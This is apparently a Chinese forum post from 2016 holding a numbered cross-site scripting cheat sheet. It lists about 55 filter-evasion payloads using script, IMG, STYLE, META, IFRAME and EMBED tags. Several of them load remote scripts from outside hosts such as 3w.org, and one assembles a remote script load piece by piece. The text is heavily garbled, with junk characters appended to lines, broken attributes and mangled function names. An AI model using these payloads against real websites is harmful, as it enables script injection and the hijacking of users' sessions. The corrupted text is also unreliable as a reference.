(1)普通的XSS JavaScript注入7 H* K0 f6 g9 z( B( z# r
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
) D, m. t- ]# |- |(99)另类弹框
" K9 k7 l! }% i; R! a4 M* Q<q/oncut=alert()>1
$ ?: j' M4 H' n9 S5 f& h<s/onclick=alert()>b( C$ _1 [" J9 b% H6 G0 ?
<XSS=" onclick="alert(1)//">clickme</SSX=">) i3 I. _- U) b R8 d& o5 J
<zzz onclick=alert`1`>clickme</zzz>
$ m; ?$ Z) \* I: f' x <a onclick=alert`1`>clickme</a>) t* u$ H& s" {6 W+ Q }
<a=">clickme</a="> n0 ^6 ~. B9 G( `6 ?9 s) x
<a=">clickme</a>% D5 P6 u4 j" ]' {
<z=">clickme</z=">9 ~1 v* ]+ W3 I0 M! R/ z3 q ~$ G3 {
<z onclick=alert`1`>clickme</z>
1 H ^5 X1 C9 e# c4 M& V6 Q; q6 T8 L3 J- T; C* ?
(2)IMG标签XSS使用JavaScript命令
* w8 ^5 B; e( s/ Y& h<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
- p9 f/ N) u. q# Q4 v- f- ^+ v( y4 ]0 x
(3)IMG标签无分号无引号& ~' J' Y& o2 B) v/ j |
<IMG SRC=javascript:alert(‘XSS’)>
+ w6 ^9 a0 v7 x) w8 _) g% R7 q- K
(4)IMG标签大小写不敏感& Y. q; m9 B" e- }/ J+ }
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
& C& Q% m. M4 P0 H4 v
7 h+ h$ q9 d/ J2 P. S( o(5)HTML编码(必须有分号)5 B" c# P( w: z
<IMG SRC=javascript:alert(“XSS”)>0 _0 |# L/ X; F: d- U5 u' K
+ B" B/ t1 ^4 [) R, P, P! Y2 x i
(6)修正缺陷IMG标签
1 Q/ V/ @3 c# D& b8 {<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>, J0 s b4 b8 F& p7 W
. s3 d% ?* Y0 q7 A
(7)formCharCode标签(计算器)
* h' K: `! m* c3 q: D9 |<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>+ d* p. p3 ~9 s6 Q; K6 m
/ [; Y; H; @. W" {: I
(8)UTF-8的Unicode编码(计算器)
* A" T1 C+ s7 |9 Q. z) g2 s<IMG SRC=jav..省略..S')>
8 l/ w, q# U: I1 w6 ]+ Q$ ?3 W0 o# s: q' G
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
: x3 A7 |# m! f2 g<IMG SRC=jav..省略..S')>
& ?9 q: \: T9 h) f8 K0 O
k+ i$ d8 w* r7 y; U) }(10)十六进制编码也是没有分号(计算器)! L, @' A8 a9 |" x4 V: U* L, w
<IMG SRC=\'#\'" /span>) A: C$ `2 A3 P* ^8 Y
) w. O6 W2 X. z: L1 W+ q(11)嵌入式标签,将Javascript分开
# Q) q6 {) }) r<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>( r# i1 Z4 V0 @
0 ^1 Z! C8 E8 J% o
(12)嵌入式编码标签,将Javascript分开9 Y% V( c8 `8 X) f. d: y
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>3 a. `2 e" a$ ~9 A5 Z. ^' j
" r, e% S8 b- f6 ] Y1 r(13)嵌入式换行符
/ K& a6 \7 K: E/ C. O<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
9 @% ~/ r1 t% N7 k+ K) P- t& D R$ v3 n/ Z& g1 z/ j
(14)嵌入式回车
' ]6 C! | F1 @! V u<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>! R' q1 K( u& {' ~
# h6 o# r h- |/ N(15)嵌入式多行注入JavaScript,这是XSS极端的例子
) ~4 _# P( b3 E0 e- Q& P. t<IMG SRC=\'#\'" /span>& L) a) Z* ]- x! L" q
! E; l9 ^& @5 t(16)解决限制字符(要求同页面)+ y' I, z$ R6 E5 F
<script>z=’document.’</script>
7 C2 [* e$ V% t0 M, \+ q( q5 ^<script>z=z+’write(“‘</script>: ^0 d& q; R7 N$ u- Q5 s
<script>z=z+’<script’</script>
! U* O: a3 F1 c<script>z=z+’ src=ht’</script> t: s4 b& M) w0 D C* _5 W7 R% @+ Z
<script>z=z+’tp://ww’</script>6 s8 R a; d; ~# _0 ]
<script>z=z+’w.shell’</script>
3 o! Y" ?( Q2 v<script>z=z+’.net/1.’</script>
6 Y4 x, v; {5 m% R2 I; ]# d<script>z=z+’js></sc’</script>
, B1 H9 w8 b' a<script>z=z+’ript>”)’</script>
5 _$ p4 I$ p5 r& D# `+ f$ R<script>eval_r(z)</script>4 l! r; Z: W8 u) s
: ^8 ^# a4 [% w( f9 V5 C(17)空字符1 i' s l1 |/ R
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out# H& f+ r1 M$ P5 H9 V4 s
% f& j+ V# W/ I) K3 N(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用" M* M, i5 o; I+ X; w: d
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
2 v/ a% ]: q5 |# I9 f' L4 O8 Q! s5 n6 U, |6 ^2 E# {1 X- H Q
(19)Spaces和meta前的IMG标签
) K5 ^3 N, w6 u2 D' }: e+ B<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>, }# x* b y0 z6 v% b2 [
$ K' q: W. A# z1 r, C4 t" H. F
(20)Non-alpha-non-digit XSS
. O. I; M# d' Q6 ^* T<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
2 q( L* ~: w5 D; ?# U& p. o
. [( F3 W A' v# l, g. Y3 l(21)Non-alpha-non-digit XSS to 2
, S" r7 @" Q& k<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>5 o% i, F" F4 }4 l) ~+ h* A& [" P
, D( t! F/ `, p% k1 q( k) F% D
(22)Non-alpha-non-digit XSS to 3) P+ ^0 ]$ O7 W1 K& T3 v* O: v
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>) o7 B* o1 ~; w
# @% ~2 Y+ Q" e8 v, {8 x+ N, W(23)双开括号: p9 {1 Q3 Z% d4 j( b
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
# L5 g2 C0 p" l0 x/ d7 q- k9 G
) m0 f7 `6 I- h: |$ `: Z- M: B2 p' u& v(24)无结束脚本标记(仅火狐等浏览器)
( l2 A$ i& U9 S8 ^2 b0 F( W<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>+ G; Y% n0 B' e5 W0 X
! s% Y0 V W1 g7 C6 P( Q$ Y( f4 k(25)无结束脚本标记21 G7 g! |% D2 a6 E o* w& q
<SCRIPT SRC=//3w.org/XSS/xss.js>
0 u+ b; |; H" H$ b$ e& L8 m, n1 u6 m0 Z5 Y/ Q
(26)半开的HTML/JavaScript XSS
1 V: X4 ^- E! |0 b, S- H3 Z' |<IMG SRC=\'#\'" /span>
9 y) @0 z1 K! P& f: L8 U# ^' }2 [% E
(27)双开角括号: `) L, W# H* [
<iframe src=http://3w.org/XSS.html <
' j7 I) C% r0 X' G4 L) k) X! |5 j y/ o3 H2 z
(28)无单引号 双引号 分号
1 T) ~4 @) R, K2 G<SCRIPT>a=/XSS/
5 X3 [* l# m/ P% L# Valert(a.source)</SCRIPT>3 ^- _/ z9 H! V* e: b% _
# K5 i; w6 L% i; r- A3 S
(29)换码过滤的JavaScript
5 l9 ^# m5 p* W, [\”;alert(‘XSS’);//0 d" R t6 X9 T1 H8 c* q3 U
/ _4 [# w& A) y(30)结束Title标签6 W; P! z4 c" J- n: U! ]. c
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>7 G; V; I; j" i) V9 P
& T1 n0 X& ^5 U8 n2 n(31)Input Image, _, P2 m+ J5 V/ r7 d. @* y4 j' V
<INPUT SRC=\'#\'" /span>' }1 }. i1 t- I& \4 d; u2 X
6 P3 F1 u4 J+ A+ H. s5 {, f
(32)BODY Image
8 [$ U( b! B" T; e<BODY BACKGROUND=”javascript:alert(‘XSS’)”>7 W0 a" B1 k6 ~( w+ @/ X: H9 p
* Y y- ~4 j$ L" c0 ?(33)BODY标签3 Y2 n+ L' f; d4 C& _
<BODY(‘XSS’)>
2 j2 G$ {: Y" [, B/ }( Z2 s) p; ?1 g1 Z
(34)IMG Dynsrc# |. C. d9 Y: g
<IMG DYNSRC=\'#\'" /span>
& Z5 W$ I1 c, ~8 _9 d7 q& i( l5 e/ N
(35)IMG Lowsrc
/ S% q" Q1 U& V4 k1 Y; N4 m( C<IMG LOWSRC=\'#\'" /span>
3 T+ P: Y7 b1 l$ i! S m( c; I& ^$ v6 B3 r4 n7 N8 n7 h
(36)BGSOUND
4 r1 K9 @0 c$ Z% f; C, g<BGSOUND SRC=\'#\'" /span>
( Q$ v7 e" X6 z- n' W8 h2 e( j* P! S
(37)STYLE sheet
7 f2 t$ w W2 h3 l: @- \<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
5 l/ j- f) x! M9 j g, Z% C1 g, J6 C- e: m7 u+ U
(38)远程样式表
! M$ Q: I# J* G* V! ]<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
$ Z! _: u; P' g8 ~4 O, K
% S' b1 l" V r* `# n# H; h. ?(39)List-style-image(列表式)
* ^7 ^- g- R- P" p$ L3 F<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS7 B. ?. f3 T/ `0 d2 l
% \8 ^! ^6 k! J5 ?; E: ~(40)IMG VBscript
. G( i+ H. M( l2 P3 O/ ?<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
* D6 G8 K3 O8 Y& p3 q
8 ^8 _' Q1 x4 B# Y(41)META链接url
$ L0 v+ ?% L9 U+ t0 u+ |9 @<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>' z& ?% ]* r- _1 H% n3 O
. N, F& B# b* H, Z4 s1 C U* l& X
(42)Iframe
( ?9 o O3 \2 M$ x* B. S! h+ D<IFRAME SRC=\'#\'" /IFRAME>
+ y4 h! {' ^9 W$ m, R0 z0 a5 c+ O$ ^9 O9 G
(43)Frame
, j! l% D2 l: p5 {8 d<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
+ N, @1 U& B S4 ?6 |: K7 z O5 T
6 I4 J6 k7 X5 m. {" i5 y; a- Y(44)Table% h2 X) E/ h" Z2 z( c4 L
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>+ Y7 K/ B) ]8 p, H9 F2 B
8 [; Z5 Z7 x; O! g
(45)TD4 F- _# i% P# I' i6 q# L' h- K
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
5 y# [5 _/ F2 W
4 J- {% ?# A% r6 s* a' f/ _(46)DIV background-image2 o0 G4 H5 a6 T2 }0 C' l
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
+ a+ F) X0 O2 e8 z4 m: E9 a" u* B, y- [1 G8 J+ g Q3 F
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)" ^0 [- K8 m, f, A
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>, f$ n% D1 j; j8 k. X2 x: A
# U9 Z/ [" t" T. T2 b+ Z. R2 D& F
(48)DIV expression* E$ L1 }: k( D* U
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
2 }4 Y6 I! n3 ?! L# J" n/ \' n: k& _8 A. r5 K1 h K
(49)STYLE属性分拆表达2 ] ?1 A2 T1 G7 y
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
+ S; B# n0 g7 ~/ D2 j+ j+ n# s+ ]1 m" _1 b$ g$ N4 y1 t
(50)匿名STYLE(组成:开角号和一个字母开头)" I+ o" k/ {* r; G
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>/ b2 `6 n2 P& B. L8 r' Z0 F( v
3 Q' q- ?1 Z' g: ^& O' n
(51)STYLE background-image' N# H' O' i# F a
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>6 j& {6 R& A' Z- Y" }
* ~! {6 T3 ?! G0 }0 g i) D( I
(52)IMG STYLE方式
! U9 C6 c! ]/ X3 `5 `5 V( `exppression(alert(“XSS”))’>6 \0 ?/ {3 W; B" t/ @5 p
; j! i* R E: N' K* T m9 |# L(53)STYLE background5 B/ [) X' T: L9 o6 f
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
5 {( t" d! ^7 d( m3 y
' U5 L& L, R. L0 X( m; p(54)BASE: L. Z1 S+ e9 C3 j' o" F8 @
<BASE HREF=”javascript:alert(‘XSS’);//”>
$ `, g# D" O( i' I. X
: ^2 x5 i V+ \3 g(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS- t; I$ g9 S+ R* t
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>+ j4 t9 u0 L0 p$ n7 L* Q/ H( p
|
发表于 2016-4-28 10:06:15
收藏
支持
反对